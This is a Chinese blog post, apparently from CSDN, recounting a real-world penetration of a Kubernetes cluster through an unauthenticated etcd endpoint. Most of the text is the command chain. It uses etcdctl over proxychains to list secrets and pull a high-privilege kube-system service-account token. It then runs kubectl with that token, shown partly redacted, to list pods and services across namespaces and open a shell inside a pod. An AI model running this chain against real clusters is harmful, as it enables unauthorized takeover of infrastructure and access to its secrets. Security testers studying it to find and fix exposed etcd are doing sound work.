ETCD 未授权访问实战案例

已于 2024-01-29 09:44:52 修改
阅读量1.7k 收藏 10
点赞数 29
分类专栏: 内网渗透 云安全 文章标签: etcd docker etcd 未授权 k8s
于 2024-01-15 17:37:01 首次发布
本文为博主原创文章,未经博主允许不得转载。
本文链接:https://blog.csdn.net/lhh134/article/details/135607124
版权

1、发现 etcd 未授权。

https://xxx200:2379/v2/keys

image.png
2、尝试在etcd里查询管理员的token,然后使用该token配合kubectl指令接管集群。

proxychains ./etcdctl --insecure-transport=false --insecure-skip-tls-verify --endpoints=https://xxx0:2379/ get / --prefix --keys-only | grep /secrets/

image.png
最终发现/registry/secrets/kube-system/xx-token-xx 为高权限 token。

proxychains ./etcdctl  --insecure-transport=false --insecure-skip-tls-verify --endpoints=https://xxx:2379/ get /registry/secrets/kube-system/tiller-token-xxx

image.png
3、通常情况下 etcd 所在 ip 即为 6443 管理端口所在 ip,探测后发现 6443 端口开放,接下来可通过 kubectl 操作 k8s。
列出kube-system 下所有 pods。

./kubectl --insecure-skip-tls-verify -s https://xxx:6443/ --token="eyJhbGciOiJSUzI1NiIsImtpZCI6IiJ9.eyJpc3MiOiJrdWJlcm5ldGVzL3NlcnZpY2VhY2NvdW50Iiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9uYW1lc3BhY2UiOiJrdWJlLXN5c3RlbSIsImt1YmVybmV0ZXMuaW8vc2VydmljZWFjY291bnQvc2VjcmV0Lm5hbWUiOiJ0xxxrRffRMx6p5lUvCPFm1b8LIY53eeq2jL0EA2ScjHPR26t9-OkGiR0bLPHpq85TmzEywKLvF03XRue_6o7uVc67W7y_7sjSSRSb-MzBHKjCYE-RqQY6-1X2JS_5m3ftlQFrQ2CUgC5HSlBA2LmP_5fJieVfX1vmL1pshjKK8Z-WlIC0STz_Qr2SLUOjBUGPATnK7yf6_q6gMCZ_p_MJVJ-kr74AxvRAcg" -n kube-system get pods

image.png

列出所有ns的pod、services

proxychains ./kubectl --insecure-skip-tls-verify -s https://xxx:6443/ --token="eyJhbGciOiJSUzI1NiIsImtpZCI6IiJ9.eyJpc3MiOiJrdWJlcm5ldGVzL3NlcnZpY2VhY2NvdW50Iiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9uYW1lc3BhY2UiOiJrdWJlLXN5c3RlbSIsImt1YmVybmV0ZXMuaW8vc2VydmljZWFjY291bnQvc2VjcmV0Lm5hbWUiOiJ0aWxsZXItdG9rZW4tdm5uamciLCJrdWJlcm5ldGVzLmlvL3NlcnZpY2xxxA2LmP_5fJieVfX1vmL1pshjKK8Z-WlIC0STz_Qr2SLUOjBUGPATnK7yf6_q6gMCZ_p_MJVJ-kr74AxvRAcg" get pods,svc --all-namespaces -o wide

image.png
权限证明。

./kubectl --insecure-skip-tls-verify -s https://xxx:6443/ --token="eyJhbGciOiJSUzI1NiIsImtpZCI6IiJ9.eyJpc3MiOiJrdWJlcm5ldGVzL3NlcnZpY2VhY2NvdW50Iiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9uYW1lc3BhY2UiOiJrdWJlLXN5c3RlbSIsImt1YmVybmV0ZXMuaW8vc2VydmljZWFjY291bnQvc2VjcxxxywKLvF03XRue_6o7uVc67W7y_7sjSSRSb-MzBHKjCYE-RqQY6-1X2JS_5m3ftlQFrQ2CUgC5HSlBA2LmP_5fJieVfX1vmL1pshjKK8Z-WlIC0STz_Qr2SLUOjBUGPATnK7yf6_q6gMCZ_p_MJVJ-kr74AxvRAcg" exec -it pod/xxx -n xxx -- bash

image.png
pod 数量 131 个,实际容器数量大于等于 131 台。
image.png

LQxdp
关注
  • 29
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
红队攻防渗透技术实战流程:云安全之云原生安全:K8s安全etcd Dashboard Configfile漏洞
HACKONE的博客
05-22 215
第二种:在打开证书校验选项后,通过本地127.0.0.1:2379可免认证访问Etcd服务,但通过其他地址访问要携带cert进行认证访问,一般配合ssrf或其他利用,较为鸡肋。etcd是master节点的数据库,通过授权获取token和证书来攻击,etcd的端口是2379:默认通过证书认证,主要存放节点的数据,如一些token和证书。第三种:实战中在安装k8s默认的配置2379只会监听本地,如果访问没设置0.0.0.0暴露,那么也就意味着最多就是本地访问,不能公网访问,只能配合ssrf或其他。
K8S安全风险及防护建议
ZAWX_NETSTARSEC的博客
07-17 989
例如,攻击者可以创建一个特权容器,该容器可以访问宿主机上的资源,并在该容器内执行命令,从而使其获得更高的权限。事中,通过融合图计算、身份欺骗等技术,对K8S进行全方位的监测,及时发现针对K8S的漏洞利用、身份窃取等风险,在遭受攻击的第一时间及时发现攻击者,对攻击行为进行阻断。比如攻击者可通过容器中运行的SSH服务执行命令,如果攻击者通过暴力破解或者其他方法获得了容器的有效凭证,他们就可以通过SSH获得对容器的远程访问。但同时,K8S也因其高度复杂的架构和众多组件,成为了攻击者攻击的目标之一。
Etcd API 授权访问漏洞修复
TiDB 社区干货传送门
10-31 827
作者: gary 原文来源: https://tidb.net/blog/2b186d9d ...
TiDB丨Etcd API 授权访问漏洞的修复
在数字化道路无限探索
12-28 1776
一文教你轻松修复漏洞!
授权访问漏洞的检测与利用
Yanug
05-07 2953
一、redis授权访问漏洞 漏洞描述 redis安装完以后,默认是没有账号密码的(安装redis详细可参考:redis相关笔记,如果redis是以root权限去运行,则可以被反弹shell或者写入ssh密钥,从而被获取服务器的权限。 漏洞检测 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host,port)) ...
etcd授权到控制k8s集群
Love&Share
01-25 3285
在安装完 K8s 后,默认会安装 etcd 组件,etcd 是一个高可用的 key-value 数据库,它为 k8s 集群提供底层数据存储,保存了整个集群的状态。大多数情形下,数据库中的内容没有加密,因此如果黑客拿下 etcd,就意味着能控制整个 K8s 集群。如果目标在启动 etcd 的时候没有开启证书认证选项,且 2379 端口直接对外开放的话,则存在 etcd 授权访问漏洞。
云上攻防-云原生篇&K8s安全&Config泄漏&Etcd存储&Dashboard鉴权&Proxy暴露
今天是几号的博客
10-15 3856
第一种:没有配置指定--client-cert-auth 参数打开证书校验,暴露在外Etcd服务存在授权访问风险。 -暴露外部可以访问,直接授权访问获取secrets和token利用 第二种:在打开证书校验选项后,通过本地127.0.0.1:2379可免认证访问Etcd服务,但通过其他地址访问要携带cert进行认证访问,一般配合ssrf或其他利用,较为鸡肋。 -只能本地访问,直接授权访问获取secrets和token利用 第三种:实战中在安装k8s默认的配置2379只会监听本地,如果访问没设置0
etcd API 授权访问漏洞
weixin_50015615的博客
05-25 1524
etcd提供了 API 访问的方式,但由于配置认证,导致etcd API 存在授权访问漏洞。在切换pd leader可能短暂出现tikv找不到pd节点,导致事务被 block,会对业务造成一定风险,影响时间在一个小时内,建议确认停止业务后进行操作。Tidb集群配置tls安全访问,需要先把pd节点由3节点缩容到1节点,这种方法对pd集群有一定风险,不太建议此方法。3)先开启非pd leader两个节点的防火墙,再把pd leader进行切换。安全检查发现etcd API 授权访问漏洞,进行修复。
常见中高危漏洞修复建议(汇总)
最新发布
weixin_59047731的博客
04-16 1440
【代码】常见中高危漏洞修复建议(汇总)
漏扫常见(可验证)漏洞复现方法
qq_50854662的博客
04-21 5404
漏扫常见漏洞复现
【技术分享】etcd授权访问的风险及修复方案详解 .pdf
09-05
【技术分享】etcd授权访问的风险及修复方案详解 安全运营 安全架构 应急响应 安全建设 安全防护
etcd实战及其原理分析.pdf
02-12
etcd实战】 2.1 etcd环境搭建 环境搭建通常包括单实例、单机多实例和多节点集群部署,可以根据需求选择合适的部署方式。在开发和测试环境中,可以通过简单的命令行工具快速启动etcd实例。 2.2 etcd客户端使用 ...
CoreOS实战:剖析etcd
03-03
利用etcd的特性,应用程序可以在集群中共享信息、配置或作服务发现,etcd会在集群的各个节点中复制这些数据并保证这些数据始终正确。etcd无论是在CoreOS还是Kubernetes体系中都是不可或缺的一环。笔者由于项目的原因...
学习 etcd实战教程
06-19
进入"03-实践篇 (13讲).zip",我们将通过实际案例来深化对etcd的理解。这部分可能包括如何在本地部署etcd集群,设置环境变量,以及使用etcdctl命令行工具进行交互。同时,实践篇可能会讲解如何在应用程序中集成etcd...
k8s对外攻击面总结
ATpiu的博客
12-19 9394
k8s对外攻击面总结/k8s漏洞
K8s攻击案例etcd 授权访问
01-02 635
etcd 用于存储K8s集群中的所有配置数据和状态信息,如果管理员配置不当,导致etcd授权访问的情况,那么攻击者就可以从etcd中获取secrets&token等关键信息,进而通过kubectl创建恶意pod从而接管集群。 (1)攻击场景 将client-cert-auth=true 改为false,把listen-client-urls监听修改为0.0.0.0,将端口被暴露出去,导...
ubuntu下安装lxml报错_ubuntu下etcd的安装部署
weixin_39652136的博客
12-21 124
一、简介etcd是一个高可用的分布式键值(key-value)数据库。etcd内部采用raft协议作为一致性算法,etcd基于Go语言实现。提供配置共享和服务发现的系统比较多,其中最为大家熟知的是[Zookeeper](后文简称ZK),而ETCD可以算得上是后起之秀了。在项目实现,一致性协议易理解性,运维,安全等多个维度上,ETCD相比Zookeeper都占据优势。etcd是一个服务发现系统,具备...
K8s攻击案例:组件授权访问导致集群入侵
12-25 8364
K8s集群往往会因为组件的不安全配置存在授权访问的情况,如果攻击者能够进行授权访问,可能导致集群节点遭受入侵。比较常见的的组件授权访问漏洞,主要包括 API Server 授权访问、kubelet 授权访问etcd 授权访问、kube-proxy 不安全配置、Dashboard授权访问。接下来,我们将对这几个授权访问的攻击场景和攻击过程进行详细的分析。01、 API Server...
 etcd 授权访问漏洞
12-22
是的,我了解ETCD存在授权访问漏洞。 在许多生产环境中,ETCD作为一种可靠的分布式键值存储系统,用于数据同步和协调各种服务。然而,最近发现了针对ETCD授权访问漏洞,攻击者可能能够访问授权的数据。 该漏洞存在于ETCD的网络通信中,可能导致授权的用户或恶意用户访问ETCD服务器上的敏感数据。攻击者可以利用此漏洞,通过发送恶意请求来获取或修改ETCD集群中的数据,从而获取敏感信息或执行恶意操作。 为了防范此类漏洞,建议采取以下措施: 1. 实施严格的访问控制:确保只有授权用户能够访问ETCD集群,并实施适当的身份验证和授权策略。 2. 使用加密通信:使用加密通信协议(如TLS)来保护ETCD与外部系统的通信。这将确保数据在传输过程中的安全性。 3. 定期审计和监控:定期对ETCD集群进行安全审计,确保没有任何授权访问尝试。同时,监控ETCD的网络流量,以便及时发现异常行为。 4. 更新和补丁:确保ETCD软件版本是最新的,并积极获取针对此类漏洞的补丁和修复程序。 5. 实施安全最佳实践:遵循ETCD的最佳安全实践,如限制对ETCD服务的网络访问,只允许必要的端口和协议通过,并限制对ETCD集群的远程访问。 总之,通过实施上述安全措施,可以减少ETCD授权访问漏洞的风险,保护数据安全。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

LQxdp

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值